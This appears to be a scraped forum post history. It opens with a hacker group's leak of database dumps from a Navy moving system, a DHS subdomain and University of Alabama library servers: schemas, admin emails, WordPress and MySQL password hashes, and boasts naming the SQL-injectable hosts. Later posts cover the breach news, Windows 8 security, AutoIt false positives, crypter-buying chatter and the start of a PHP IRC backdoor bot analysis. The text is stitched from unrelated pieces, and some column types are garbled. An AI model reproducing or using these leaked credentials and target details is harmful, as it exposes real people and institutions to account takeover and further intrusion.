+-------------------+----------+ | DESCRIPTION | VARCHAR2 | | ITEM_NBR | NUMBER | | ORDERS_SERIAL_KEY | NUMBER | | SHIPMENT_NUMBER | NUMBER | +-------------------+----------+ Database: HHG_MGR Table: SHIPMENT [96 columns] +--------------------------------+----------+ | Column | Type | +--------------------------------+----------+ | ADDITIONAL_SERVICE_REQUIRED | VARCHAR2 | | AGENT_CODE | VARCHAR2 | | AUTHORIZED_DISTANCE | NUMBER | | BLUEBARK_MIA_AUTH_SIGNER_NAME | VARCHAR2 | | BLUEBARK_MIA_AUTH_SIGNER_TITLE | VARCHAR2 | | CANCEL_OUTBOUND_PART_OF_SHIPMT | VARCHAR2 | | CARRIER_CODE | VARCHAR2 | | CODE_OF_SERVICE | VARCHAR2 | | CODE_OF_SERVICE_FOR_EXCESS_EST | VARCHAR2 | | CONS_SHIP_NO | VARCHAR2 | | CONSUMABLES_AUTHORIZED | VARCHAR2 | | DATE_CANCELLATION_REQUESTED | DATE | | DATE_COMPLETE_SHIPMENT_ARRIVED | DATE | | DATE_FAX_PRINTED | DATE | | DATE_GBL_PRINTED | DATE | | DATE_SERV_NOTE_PRINTED | DATE | | DATE_SHIPMENT_COUNSELED | DATE | | DATE_SHIPMENT_PICKED_UP | DATE | | DECLARED_VALUATION_AMOUNT | NUMBER | | DEPLOYMENT_MOVE_NUMBER | VARCHAR2 | | DESTINATION_DPM_ZONE | VARCHAR2 | | DESTINATION_GBLOC | VARCHAR2 | | DESTINATION_RATE_AREA | VARCHAR2 | | DIRECT_DELIVERY_REQUESTED | VARCHAR2 | | DPM_SHIPMENT_IND | VARCHAR2 | | DPM_ZONE | VARCHAR2 | | DTGBL_ORIGIN_ZONE | VARCHAR2 | | EXCESS_COST_ESTIMATE | NUMBER | | EXCESS_COST_PRECOLLECTED | NUMBER | | EXCESS_COST_TO_PRECOLLECT | NUMBER | | EXCESS_COSTS_EXIST | VARCHAR2 | | EXPENSIVE_ITEMS_NO_OF_CARTONS | NUMBER | | EXPORT_SHIPMENT_INFO_TO_DEST | VARCHAR2 | | GBL_NUMBER | VARCHAR2 | | GOCS_ORDERED | VARCHAR2 | | INSPECTION_REQUESTED_AT_DEST | VARCHAR2 | | IS_OCONUS | VARCHAR2 | | LOCAL_MOVE_INDICATOR | VARCHAR2 | | MBR_CODE_MODE_PREFERENCE | VARCHAR2 | | MBR_REQUESTED_DELIVERY_DATE | DATE | | MBR_REQUESTED_PICKUP_DATE | DATE | | MBR_WILLING_TO_PAY_C_C_PREFER | VARCHAR2 | | MBR_WILLING_TO_PAY_CODE_PREFER | VARCHAR2 | | MEMBER_REQUESTED_PACK_DATE | DATE | | MEMBER_REQUESTED_PACK_DATE_2 | DATE | | 
MEMBER_REQUESTED_PACK_DATE_3 | DATE | | METHOD_OF_SHIPMENT | VARCHAR2 | | NTS_MULT_SHIPMT_IND | VARCHAR2 | | NTS_MULT_SHIPMT_SEQ_NUM | NUMBER | | NTS_MULT_UNPACKING_REQUIRED | VARCHAR2 | | NUMBER_OF_SPLIT_PORTIONS | NUMBER | | OLD_SHIPMT_ACCT_CLASS | VARCHAR2 | | ONE_TIME_ONLY_INDICATOR | VARCHAR2 | | OPERATING_ALLOW_AMOUNT_ADVANCE | NUMBER | | OPERATING_ALLOWANCE_AMOUNT | NUMBER | | ORDERS_SERIAL_KEY | NUMBER | | ORIGIN_GBLOC | VARCHAR2 | | ORIGIN_PPPO | VARCHAR2 | | ORIGIN_RATE_AREA | VARCHAR2 | | PARCEL_CONSIGNED_TO_DEST_ITO | VARCHAR2 | | PARCEL_REGISTERED_CERT_NUMBER | VARCHAR2 | | PARCEL_SERVICE_DATE_SENT | DATE | | PARCEL_SERVICE_METHOD | VARCHAR2 | | PARTIAL_DELIVERY_REQUESTED | VARCHAR2 | | PM_ADVANCE | CHAR | | PM_TAXES_STATE | CHAR | | POWER_OF_ATTORNEY_NAME | VARCHAR2 | | POWER_OF_ATTORNEY_RELATIONSHIP | VARCHAR2 | | RELEASED_VALUATION_OPTION | VARCHAR2 | | REMOTE_STAT_NUM_CODE | VARCHAR2 | | REQUESTED_DISTANCE | NUMBER | | REQUIRED_DELIVERY_DATE | DATE | | RESIDENT_PKUP_NUM | NUMBER | | REWEIGH_NUMBER | VARCHAR2 | | REWEIGH_REQUESTED_AT_DEST | VARCHAR2 | | RS_WGT_CHARGE_AGAINST_ENTITLE | VARCHAR2 | | SHIPMENT_CONTAINS_FIREARMS | VARCHAR2 | | SHIPMENT_CONTAINS_MOTORCYCLE | VARCHAR2 | | SHIPMENT_CONTAINS_POV | VARCHAR2 | | SHIPMENT_NUMBER | NUMBER | | SHIPMENT_OUT_OF_NTS | VARCHAR2 | | SHIPMENT_OUT_OF_P_AND_C | VARCHAR2 | | SHIPMENT_STATUS_CODE | VARCHAR2 | | SHIPMENT_STATUS_DATE | DATE | | SHIPMT_ACCOUNT_CLASSIFICATION | VARCHAR2 | | SHIPMT_CANCELLATION_REQUESTED | VARCHAR2 | | SPECIAL_SHIPMENT_CIRCUMSTANCE | VARCHAR2 | | SPLIT_SHIPMENT_INDICATOR | VARCHAR2 | | TDY_SEGMENT_INDICATOR | VARCHAR2 | | TIME_FAX_PRINTED | VARCHAR2 | | TIMESTAMP | DATE | | TRANSPORTATION_CONTROL_NUMBER | VARCHAR2 | | TYPE_OF_SHIPMENT | VARCHAR2 | | VOLUME_MOVE_NUMBER | VARCHAR2 | | WT_CHARGEABLE_AGAINST_ENTITLE | VARCHAR2 | | Z_TONNAGE_INDICATOR | VARCHAR2 | +--------------------------------+----------+ Database: HHG_MGR Table: SHIPMENT_SUPPLEMENT [22 columns] 
+------------------------+----------+ | Column | Type | +------------------------+----------+ | GS_RELEASE_TYPE | VARCHAR2 | | GS_REQUEST_STORAGE_EXT | VARCHAR2 | | NUM_PACK_DAYS | NUMBER | | ORDERS_SERIAL_KEY | NUMBER | | PROF_BOOKS_EQUIP | VARCHAR2 | | REQ_DELIV_DATE | DATE | | REQ_PICKUP_DATE_1 | DATE | | REQ_PICKUP_DATE_2 | DATE | | REQ_PICKUP_DATE_3 | DATE | | SHIPMENT_NUMBER | NUMBER | | SHIPMENT_TYPE | VARCHAR2 | | SI_BOAT | VARCHAR2 | | SI_GASOLINE_APPLIANCES | VARCHAR2 | | SI_JETSKI | VARCHAR2 | | SI_MOBILEHOME | VARCHAR2 | | SI_PIANO | VARCHAR2 | | SI_PLASMA | VARCHAR2 | | SI_PROPANE_TANK | VARCHAR2 | | SI_SCUBA | VARCHAR2 | | SI_UNUSUAL_OVERSIZE | VARCHAR2 | | SI_UTILITY_TRAILER | VARCHAR2 | | SI_WASHING_MACHINE | VARCHAR2 | +------------------------+----------+ Database: HHG_MGR Table: SHIP_ADDL_ADDRESSES [36 columns] +--------------------------------+----------+ | Column | Type | +--------------------------------+----------+ | ADDL_DEL_DESIG_AGENT_NAME | VARCHAR2 | | ADDL_DEL_DESIG_AGENT_PH_COM | VARCHAR2 | | ADDL_DEL_DESIG_AGENT_PH_DSN | VARCHAR2 | | ADDL_DEL_DESIG_AGENT_PHONE_EXT | VARCHAR2 | | ADDL_DEL_DESIG_AGENT_RELATN | VARCHAR2 | | ADDL_DELIVERY_ADDR_CITY | VARCHAR2 | | ADDL_DELIVERY_ADDR_PHONE | VARCHAR2 | | ADDL_DELIVERY_ADDR_PHONE_EXT | VARCHAR2 | | ADDL_DELIVERY_ADDR_STATE | VARCHAR2 | | ADDL_DELIVERY_ADDR_STREET | VARCHAR2 | | ADDL_DELIVERY_ADDR_ZIP_APO_FPO | VARCHAR2 | | ADDL_DELIVERY_COUNTRY | VARCHAR2 | | ADDL_DELIVERY_COUNTY | VARCHAR2 | | ADDL_PICKUP_ADDR_CITY | VARCHAR2 | | ADDL_PICKUP_ADDR_PHONE_NUMBER | VARCHAR2 | | ADDL_PICKUP_ADDR_STATE | VARCHAR2 | | ADDL_PICKUP_ADDR_STREET | VARCHAR2 | | ADDL_PICKUP_ADDR_ZIP_APO_FPO | VARCHAR2 | | ADDL_PICKUP_COUNTRY | VARCHAR2 | | ADDL_PICKUP_COUNTY | VARCHAR2 | | ADDL_PICKUP_DESIG_AGENT_NAME | VARCHAR2 | | ADDL_PICKUP_DESIG_AGENT_PH_COM | VARCHAR2 | | ADDL_PICKUP_DESIG_AGENT_PH_DSN | VARCHAR2 | | ADDL_PICKUP_DESIG_AGENT_RELATN | VARCHAR2 | | ADDL_PUP_ADDR_PHONE_NUMBER_EXT | VARCHAR2 | | 
ADDL_PUP_DESIG_AGENT_PHONE_EXT | VARCHAR2 | | ADDL_SERVICE_LOCATION | VARCHAR2 | | HHG_XTRA_DELIV_ALT_CNT_PH_COM | VARCHAR2 | | HHG_XTRA_DELIV_ALT_CNT_PH_DSN | VARCHAR2 | | HHG_XTRA_DELIV_TYPE | VARCHAR2 | | HHG_XTRA_DELIV_WORK_PHONE_COM | VARCHAR2 | | HHG_XTRA_DELIV_WORK_PHONE_DSN | VARCHAR2 | | HHG_XTRA_DELIV_WORK_PHONE_EXT | VARCHAR2 | | HHGXTRA_DDELIV_ALT_CNT_NAME | | | ORDERS_SERIAL_KEY | NUMBER | | SHIPMENT_NUMBER | NUMBER | +--------------------------------+----------+ Database: HHG_MGR Table: SHIP_ADDRESSES [45 columns] +--------------------------------+----------+ | Column | Type | +--------------------------------+----------+ | AUTHORIZED_DEST_ZIP_APO_FPO | VARCHAR2 | | AUTHORIZED_DESTINATION_CITY | VARCHAR2 | | AUTHORIZED_DESTINATION_COUNTRY | VARCHAR2 | | AUTHORIZED_DESTINATION_COUNTY | VARCHAR2 | | AUTHORIZED_DESTINATION_STATE | VARCHAR2 | | AUTHORIZED_ORIGIN_CITY | VARCHAR2 | | AUTHORIZED_ORIGIN_COUNTRY | VARCHAR2 | | AUTHORIZED_ORIGIN_COUNTY | VARCHAR2 | | AUTHORIZED_ORIGIN_STATE | VARCHAR2 | | AUTHORIZED_ORIGIN_ZIP_APO_FPO | VARCHAR2 | | DELIVERY_ADDR_PHONE_NUMBER_EXT | VARCHAR2 | | DELIVERY_ADDRESS_CITY | VARCHAR2 | | DELIVERY_ADDRESS_PHONE_NUMBER | VACCHAR2 | | DELIVERY_ADDRESS_STATE | VARCHAR2 | | DELIVERY_ADDRESS_STREET | VARCHAR2 | | DELIVERY_ADDRESS_ZIP_APO_FPO | VARCHAR2 | | DELIVERY_COUNTRY | VARCHAR2 | | DELIVERY_COUNTY | VARCHAR2 | | DELIVERY_DESIG_AGENT_NAME | VARCHAR2 | | DELIVERY_DESIG_AGENT_PHONE_COM | VARCHAR2 | | DELIVERY_DESIG_AGENT_PHONE_DSN | CR2CHAR2 | | DELIVERY_DESIG_AGENT_PHONE_EXT | VARCHAR2 | | DELIVERY_DESIG_AGENT_RELATN | VARCHAR2 | | HHG_ALT_CONTACT_PHONE_COM | VARCHAR2 | | HHG_ALT_CONTACT_PHONE_EXT | VARCHAR2 | | HHG_ALT_CONTT_P_PHONE_DSN | | | HHG_WORK_PHONE_COM | VARCHAR2 | | HHG_WORK_PHONE_DSN | VARCHAR2 | | HHG_WORK_PHONE_EXT | VARCHAR2 | | ORDERS_SERIAL_KEY | NUMBER | | PICKUP_ADDR_PHONE_NUMBER_EXT | VARCHAR2 | | PICKUP_ADDRESS_CITY | VARCHAR2 | | PICKUP_ADDRESS_PHONE_NUMBER | VARCHAR2 | | PICKUP_ADDRESS_STATE | 
VARCHAR2 | | PICKUP_ADDRESS_STREET | VARCHAR2 | | PICKUP_ADDRESS_ZIP_APO_FPO | VARCHAR2 | | PICKUP_COUNTRY | VARCHAR2 | | PICKUP_COUNTY | VARCHAR2 | | PICKUP_DESIG_AGENT_NAME | VARCHAR2 | | PICKUP_DESIG_AGENT_PHONE_COM | VARCHAR2 | | PICKUP_DESIG_AGENT_PHONE_DSN | VARCHAR2 | | PICKUP_DESIG_AGENT_PHONE_EXT | VARCHAR2 | | PICKUP_DESIG_AGENT_RELATN | VARCHAR2 | | SHIPMENT_NUMBER | NUMBER | | UNUSUAL_PICKUP_SPECIFICS | VARCHAR2 | +--------------------------------+----------+ Database: HHG_MGR Table: SWM_QUEUE [7 columns] +-----------------------+----------+ | Column | Type | +-----------------------+----------+ | FILENAME | VARCHAR2 | | MEMBER_SSN | VARCHAR2 | | ORDERS_NUMBER | VARCHAR2 | | ORDERS_SERIAL_KEY | NUMBER | | RECORD_PROCESSED_FLAG | VARCHAR2 | | SHIPMENT_NUMBER | NUMBER | | TTIMESTAMP | DATE | +-----------------------+----------+ Database: HHG_MGR Table: TOAD_PLAN_TABLE [36 columns] +-------------------+----------+ | Column | Type | +-------------------+----------+ | ACCESS_PREDICATES | VARCHAR2 | | BYTES | NUMBER | | CARDINALITY | NUMBER | | COST | NUMBER | | CPU_COST | NUMBER | | DEPTH | NUMBER | | DISTRIBUTION | VARCHAR2 | | FILTER_PREDICATES | VARCHAR2 | | ID | NUMBER | | IO_COST | NUMBER | | OBJECT_ALIAS | VARCHAR2 | | OBJECT_INSTANCE | NUMBER | | OBJECT_NAME | VARCHAR2 | | OBJECT_NODE | VARCHAR2 | | OBJECT_OWNER | VARCHAR2 | | OBJECT_TYPE | VARCHAR2 | | OPERATION | VARCHAR2 | | OPTIMIZER | VARCHAR2 | | OPTIOSS | | | OTHER | LONG | | OTHER_TAG | VARCHAR2 | | OTHER_XML | CLOB | | PARENT_ID | NUMBER | | PARTITION_ID | NUMBER | | PARTITION_START | VARCHAR2 | | PARTITION_STOP | VARCHAR2 | | PLAN_ID | NUMBER | | POSITION | NUMBER | | PROJECTION | VARCHAR2 | | QBLOCK_NAME | VARCHAR2 | | REMARKS | VARCHAR2 | | SEARCH_COLUMNS | NUMBER | | STATEMENT_ID | VARCHAR2 | | TEMP_SPACE | NUMBER | | TIME | NUMBER | | TIMESTAMP | DATE | +-------------------+----------+ Database: HHG_MGR Table: UNUSUAL_OVERSIZE_ITEMS [4 columns] +-------------------+----------+ | Column | 
====ACCOUNT INFO====
Database: HHG_MGR
Table: ACCOUNT
Amount pulled: 20/1304

DHS.GOV:

Target: DHS.gov
Vulnerable subdomain: twicinformation.tsa.dhs.gov
Exploitable method: Blind SQL-Injection
Database: Oracle

I KNOW KUNG-FOO!
DHG.GOV TIME!
WHERE IS THERE SECURITY NOW?
KUNG-FOO'D BY DIGITALCORRUPTION!

databases [3]:
[*] CSMIG
[*] CTXSYS
[*] FAMP

UA.EDU:

Target: ua.edu
| |~||==| | || |##|| | | || | |JRO|||-| | |==|+|+||-|-|~||__| | ||__|__||__|_|_||_|_|___|||_|__|_|__|_|_||_|_|_||__|_| ||_______________________||__________________________| | _____________________ || __ __ _ __ _ | ||=|=|=|=|=|=|=|=|=|=|=| __..\/ | |_| ||#||==| / /| || | | | | | | | | | | |/\ \ \\|++|=| || ||==| / / | ||_|_|_|_|_|_|_|_|_|_|_/_/\_.___\__|_|__||_||__|/_/__| |____________________ /\~()/()~//\ __________________| | __ __ _ _ \_ (_ . _/ _ _ _____| HMM! WHICH UNIVERSITY SHOULD WE OWN NOW? ||~~|_|..|__| || |_ _ \ //\\ / |=|_ /) |___| | | | ||--|+|^^|==|1||2| | |__/\ __ /\__| |(\/((\ +|+|=|=|=| ||__|_|__|__|_||_|_| / \ \ / / \_|_\___/|_|_|_|_|_| |_________________ _/ \/\/\/ \_ / /__________| FOUND ONE! UA.EDU HAS SOME JUICY INFORMATION! | _____ _ __ |/ \../ \/ / __ ___| ||_____|_| |_|##|_|| | \/ __\ /=|_|++|_|-||| ||______||=|#|--| |\ \ o \_____/ |~| | | ||| ||______||_|_|__|_|_\ \ o | |_|_|__|_|__|_|_||| |_________ __________\___\_______|____________ ______|SHOULD WE PROCEED? |__ _ / ________ ______ /| _ _ _| |\ \ |=|/ // /| // / / / | / ||%|%|%| | \/\ |*/ .//____// // /__/__/ (_) / ||=|=|=| __| \/\|/ /(____|/ // / /||~|~|~|__ |___\_/ /________// ________ / / ||_|_|_| DATABASE FOUND! DUMPING DATASBASE NOW! 
|___ / (|________/ |\_______\ / /| |______| / \|________) / / | | ================================================================= available databases [59]: [*] alauth [*] alm [*] ARCHIVISTSTK [*] ArchivistsTKTest [*] ATKBackup120711_5pm [*] backup [*] bbq [*] blogdb [*] CSV_DB [*] drupal-acftb [*] drupal-alm [*] drupal-highschool [*] drupal-highschool-092509 [*] drupal-highschool-111209 [*] drupal-intranet [*] drupal-intranet-092509 [*] drupal-intranet-111209 [*] drupal-www [*] drupal-www-111209 [*] drupal-www-dev [*] drupal-www-dev-111209 [*] event_signup [*] Gorgas_Videos [*] Hoole_FindingAids [*] InfoLitQuiz [*] information_schema [*] lib_databases [*] lib_hours [*] Lib_Intranet [*] libgame [*] libstats [*] libstats-fall2008 [*] libstats-summer2008 [*] libstats_fall2009 [*] libstats_fall2010 [*] libstats_spring2009 [*] libweb1_dbs [*] mrbs [*] mrbstest [*] mysql [*] nhprc [*] OLD_blogdb [*] randd [*] refstats [*] selmrbs [*] smcstats [*] staffdirectory [*] survey [*] test [*] thezone [*] timeclock [*] videos [*] weblab [*] wikidb [*] wordpress [*] wordpress-mu [*] wordpress-mu-public [*] wordpress_mu_public_backup_03032011 [*] wp-public-backup-for-312-update ================================================================= ================================================================= Database: blogdb [11 tables] +---------------------------+ | mclure_commentmeta | | mclure_comments | | mclure_links | | mclure_options | | mclure_postmeta | | mclure_posts | | mclure_term_relationships | | mclure_term_taxonomy | | mclure_terms | | mclure_usermeta | | mclure_users | +---------------------------+ ================================================================= ================================================================= Database: blogdb Table: mclure_users [10 columns] +---------------------+---------------------+ | Column | Type | +---------------------+---------------------+ | display_name | varchar(250) | | ID | bigint(20) unsigned | | 
user_activation_key | varchar(60) | | user_email | varchar(100) | | user_login | varchar(60) | | user_nicename | varchar(50) | | user_pass | varchar(64) | | user_registered | datetime | | user_status | int(11) | | user_url | varchar(100) | +---------------------+---------------------+ ================================================================= ================================================================= Database: blogdb Table: mclure_users [2 entries] +----+------------------------+------------+------------------------------------+ | ID | user_email | user_login | user_pass | +----+------------------------+------------+------------------------------------+ | 1 | webdev@bama.ua.edu | admin | $P$BwGN0z5Y7dMs8UTHjyH9hiBtztJTi.1 | | 6 | library.systems@ua.edu | libsys | $P$BHc8ZXg1YEOz479MqTgIhwMT6rRzOm1 | +----+------------------------+------------+------------------------------------+ ================================================================= ================================================================= Database: mysql [18 tables] +---------------------------+ | columns_priv | | db | | func | | help_category | | help_keyword | | help_relation | | help_topic | | host | | proc | | procs_priv | | tables_priv | | time_zone | | time_zone_leap_second | | time_zone_name | | time_zone_transition | | time_zone_transition_type | | user | | user_info | +---------------------------+ ================================================================= ================================================================= Database: mysql Table: user [37 columns] +-----------------------+-----------------------------------+ | Column | Type | +-----------------------+-----------------------------------+ | Alter_priv | enum('N','Y') | | Alter_routine_priv | enum('N','Y') | | Create_priv | enum('N','Y') | | Create_routine_priv | enum('N','Y') | | Create_tmp_table_priv | enum('N','Y') | | Create_user_priv | enum('N','Y') | | Create_view_priv | enum('N','Y') | | 
Delete_priv | enum('N','Y') | | Drop_priv | enum('N','Y') | | Execute_priv | enum('N','Y') | | File_priv | enum('N','Y') | | Grant_priv | enum('N','Y') | | Host | char(60) | | Index_priv | enum('N','Y') | | Insert_priv | enum('N','Y') | | Lock_tables_priv | enum('N','Y') | | max_connections | int(11) unsigned | | max_questions | int(11) unsigned | | max_updates | int(11) unsigned | | max_user_connections | int(11) unsigned | | Password | char(41) | | Process_priv | enum('N','Y') | | References_priv | enum('N','Y') | | Reload_priv | enum('N','Y') | | Repl_client_priv | enum('N','Y') | | Repl_slave_priv | enum('N','Y') | | Select_priv | enum('N','Y') | | Show_db_priv | enum('N','Y') | | Show_view_priv | enum('N','Y') | | Shutdown_priv | enum('N','Y') | | ssl_cipher | blob | | ssl_type | enum('','ANY','X509','SPECIFIED') | | Super_priv | enum('N','Y') | | Update_priv | enum('N','Y') | | User | char(16) | | x509_issuer | blob | | x509_subject | blob | +-----------------------+-----------------------------------+ ================================================================= ================================================================= Database: mysql Table: user [49 entries] +-----------------------------+-------------------------------------------+----------------+ | Host | Password | User | +-----------------------------+-------------------------------------------+----------------+ | % | *42085790413E194A45ED1CBCC9CB8D4B3EF2EA3D | _alauth | | % | None | hoole | | % | None | metadata | | 130.160.140.0/255.255.254.0 | None | videos | | 130.160.140.132 | *88E08A2EE7DB5F8604616F0BE6B6DEEB9467ABF0 | jtillis | | libweb1.lib.ua.edu | *A88C335072B994677457ACE39AFC5D05CEAA6C5F | None | | libweb1.lib.ua.edu | *D44B3EC263F2D62ED17B04801ECCB000F954AB80 | root | | localhost | *D1FFD8F4C94CDFC39795EB5DCBCFC571F152BD93 | None | | localhost | *225DF22F816B86208F0445DF2311292C1F98B665 | HoolFindAid | | localhost | *C15B44C650AB9630DB16AD782F9D19EEB87F215D | _alauth | | 
localhost | *45F9B5A3417AA96BF37A9D8F97197EBA501D0918 | alm | | localhost | *B0053F607C9BFBF0A6775C3DFBBA647F4C416B88 | alm_events | | localhost | *A7509FE385B684E6C1A1AED01288D80CCA7419DE | blogdb | | localhost | *DCB433CF5950534CE7E908622049C25698318249 | databases_a | | localhost | *5AD70578202705F378E686C879D61B1077037498 | databases_u | | localhost | *7480B41B36DD2A912226F06EF9F70B1017D17436 | db_dhill | | localhost | *FB96B0B59E8888D7A1380C20EB28AA97650B43B6 | db_lewis062 | | localhost | *DE734092E6E6ABBA5279C5CC178D254370D9EB30 | db_mpatrick | | localhost | *DE734092E6E6ABBA5279C5CC178D254370D9EB30 | drupalacftb | | localhost | *84F90310487185B213EC46DEA53F9CDE3FA2124C | drupalalm | | localhost | *C0E18229096B925DE7A5637EC9628F289258E40A | drupalhs | | localhost | *DFAA26BA2CB170023362465BB13000E5F0F53FED | drupalintra | | localhost | *A082F81E7F76213A3D5BF840A062A4C412679453 | drupalwww | | localhost | *56B6EAD890E5B05E3CC6C615080079C0FB5DE791 | drupalwww-read | | localhost | *9932B1970B0AF7E27241DD33B744B7B185247EE8 | fundraiser | | localhost | *79C821F9EAE10B0B32963C9BF0B92EA9C8AA8FE8 | infolit | | localhost | *1C9BA4BACD386B1B3DB157596D7BDEFE07DBF28A | libgame | | localhost | *B44FCC110162C8865C0D23D8DA8271D8F46E6A7E | libintranet | | localhost | *4432CFD281B6728C842A2355D12AE475AAA8CEEC | libstatsu | | localhost | *5FB1B405C6AB0BAF56CA0CDC28346D8CA2A26B22 | mrbs | | localhost | *69E1CA1574C4D49F6CA885C97643AE5752464C76 | mrbs_viewer | | localhost | *347C4DD22AD3FCFDBA27A06618F25193D37F1B63 | mrbstest | | localhost | *FD7E4BBD242CFA10B3FDAA56CA7B94342C5C5AA0 | musiclib | | localhost | *3FD973352F241C483C20E82E7CA585DEBE1E6634 | nhprc | | localhost | *A4A1EF3BC857C72A60FD9F46E308864D90F4B7A9 | randd | | localhost | *A4A1EF3BC857C72A60FD9F46E308864D90F4B7A9 | refstats | | localhost | *8DD6F48097EE9556174491C0E134B5EC8B27D6D8 | root | | localhost | *03516F1D34186E5E7D494D90FEC4162789AA1356 | selmrbs | | localhost | *A5EF62914245BD345C4470A0D43EE7E008AD9C40 
| sjturner1 | | localhost | *9A154FBFD29CBFA9039B6FBB42368A59EA8EB878 | smcstats | | localhost | *66D8702E3166514F3077116B25C4A16F3FE12C9A | staffdir | | localhost | *0ABAB21EE59FEA921D859CEA9D2DC643B2849B5A | survey_user | | localhost | *F094216EB8504680E6BB34783FC409A7407C4373 | timeclock | | localhost | *A5892368AE83685440A1E27D012306B073BDF5B7 | videos | | localhost | *F5C1F6CD69B494439CBBFD9782F50FA2A973AC0C | weblab | | localhost | *F23127EE15F63C55C154DDB0467C9D863B99061B | wikidb | | localhost | *98AD3EFE7D729B67F379E125C0F12E53E0037D24 | wordpress | | localhost | *26ED4440AAEB5C1EEAAA83FBEA0985AE0D35626D | wpmu122 | | localhost | *0D0A4670814AE3D58163A3D831901A10E50B5F78 | wpmupub | +-----------------------------+-------------------------------------------+----------------+ ================================================================= .-------. .' `. .' `. |.-. .-. .-. .-.| |`-. | | | |-'| |`-' ' `-' ' | ' ' `. .'.''. .''. `._______.' __ __ | | .----/ \ / \---. | | | | | | |____ | | | |`--''`--'| / | \_ ,----.| \ O | O _ | | | \ | ---'| '._/ \_.| `| | | | \.---'| | | `- ,| | `---'| | : | | | | | '._.-- ; | | | . .: ` / '-' | '....' `.______/ | | | | `----------------' || ||fsr || || _.---'' '-, ,-' ''---._ / __..' '..__ \ WELL FOLKS, THAT WAS THE END OF OUR ZINE. SEE YOU NEXT TIME! [url=http://Digital-corruption.org]Digital-Corruption[/url] [url]http://pastebin.com/raw.php?i=VtTwtC4S[/url] [url=http://thehackernews.com/]The Hacker News [ THN ][/url]
  7. I have also tested Windows 8 a bit, and this new "App Container" is actually a good idea. It gives the operating system a way to make better decisions about the actions or applications that are running.
  8. Department of Homeland Security and U.S Navy hacked

    Department of Homeland Security and U.S Navy websites are once again at major risk. This time a hacking group called "Digital-corruption" hacked into subdomains of both sites and leaked database info on pastebin.

    In its announcement on the pastebin.com website, the group said it has leaked databases from https://www.smartwebmove.navsup.navy.mil/ and twicinformation.tsa.dhs.gov using the Blind SQL-Injection method. The database includes usernames, passwords, email IDs, and security questions and answers of all users.

    Hackers shout: say("#FreeTriCk #FreeMLT #FreePhantom"); say("Knowledge is power!"); say("NAVY.MIL, care to share some of your staff information?");

    Department of Homeland Security and U.S Navy websites have been hacked many times in the past year by different hackers from all over the world.

    Source
  9. Windows 8 will be challenge for Malware writers

    Microsoft's security researchers believe that the upcoming operating system, Windows 8, is a step forward in security and that Windows 8 will be far better at protecting against malware than its predecessors.

    Chris Valasek, a senior security research scientist at development testing firm Coverity, began examining the security features of Windows 8 last autumn, before the consumer previews of the upcoming revamp of the new Microsoft OS came out.

    One major change between Windows 7 and 8 is the addition of more exploit-mitigation technologies, however. Windows Memory Managers (specifically the Windows Heap Manager and Windows Kernel Pool Allocator) are designed to make it far harder for attackers to exploit buffer-overflow vulnerabilities and the like to push malware onto vulnerable systems. The "security sandbox" for applications for Windows 8 will also be a great step forward.

    "These new Windows 8 Apps will be contained by a much more restrictive security sandbox, which is a mechanism to prevent programs from performing certain actions," Valasek explains. "This new App Container provides the operating system with a way to make more fine-grained decisions on what actions certain applications can perform, instead of relying on the more broad 'Integrity Levels' that debuted in Windows Vista/7."

    Windows 8 also comes with a new version of Internet Explorer, Microsoft's browser software. Internet Explorer 10 will come with a mode that disables support for third-party plug-ins such as Flash and Java.

    Source
  10. Posted 17 October 2006 - 03:22 PM

    If you have been using AutoIt for any length of time you will know that it is a great, and powerful scripting language. As with all powerful languages there comes a downside. Virus creation by those that are malicious.

    AutoIt has no virii installed on your system, and if a script you have created has been marked as a virus, (and you're not malicious) then this is a false positive. They found a set of instructions in an AutoIt EXE out there somewhere, took the general signature of the file, and now all AutoIt EXE's are marked (or most of them). This can be due to several reasons.

    1. AutoIt is packed with UPX. UPX is an open source software compression packer. It is used with many virii (to make them smaller).
    2. Malicious scripter got the AutoIt script engine recognized as a virus.

    And I am sure there are more ways your executable could be marked, but that covers the basics.

    Now I am sure you are wanting to know what you can do to get back up and running without being recognized as a virus. You have to send in a report to the offending AV company alerting them to the false positive they have made. It never hurts to send in your source code along with a compiled exe, to help them realize their mistake. You may have to wait up to 24 hours for them to release an update. The time it takes really depends on the offending AV company.

    Source: Are my AutoIt EXEs really infected? - General Help and Support - AutoIt Forums
  11. Wubi

    RST vs. Polonic

    Well, the problem is that she is completely "missing tiles on her roof", to put it without insulting her.
  12. Wubi

    RST vs. Polonic

    Nobody is going to go and kick the bucket. I think.
  13. 2. route add default gw 10.0.0.1
    3. route
    4. (2)
    5. (2) ifconfig eth0 down
    6. I don't know, I think 1.
    7. (3)
    8. 2 and 6
    9. (1) netstat -a | grep ftp
    10. 2; 4; 5; 6;
    11. (4)
    12. (4)
    13. 32 bits (IPv4); (IPv6 uses 128 bits);
    14. (1)
    15. (2)
    16. (2); (1)
    17. (1); (3)
    18. (3)
    19. (1); (3); (4);
    20. (5)
    21. (4)
    22. (1); (2) and I think (5)
    23. (1); (2);
    24. (2) is correct
    25. (1); (2);
    26. (1); (4);
    27. (2) ssh -l u7 19.0.0.1
    28. (3), although I'm not sure whether the command is correct. scp [[user@]from-host:]source-file [[user@]to-host:][destination-file]
    29. I think (4).
  14. Wubi

    RST vs. Polonic

    It doesn't surprise me that she's a teacher. A crazy woman like this has appeared in the media before. http://www.youtube.com/watch?v=wOaxOt-dp28 Maybe I'm the only one, but it doesn't surprise me at all. Too many lunatics who think they're Napoleon hold various positions, while competent people are either unemployed, have gone off to pick strawberries, or have a "second job", doctor by day, stripper by night, as Badea says...
  15. Wubi

    eMag gift card

    This card will be valid starting 03.08.2012
  16. Incidents like this have been reported before with the iPhone 4.
  17. Stop struggling to find someone to pay to crypt for you. Whoever is willing to do it will do it for free. You shouldn't trust just any random person who joined the forum in 2008 and has 10 posts. Lately it seems many get excited over 5 or 10 euros and turn to scams. PS: If you have money to throw around anyway, buy yourself a crypter.
  18. You stole my idea.
  19. For IRC enthusiasts, it is nothing new to come across IRC bots on underground channels that have built-in functions such as port scanning, nmap, SQL Injection scanners, RFI/LFI scanners, credit card checkers, etc., which automatically spread a shell, and much more. These IRC bots are usually written in languages such as Perl, PHP and Python, and most of them are available on pastebin.

    I have written before about bots that are hosted on roots or on websites that have backdoor shells. In this topic, we will take a look at pBot, an IRC bot written in PHP that has functions similar to a backdoor shell, along with stress-testing functions.

    For those who want to analyze the script:

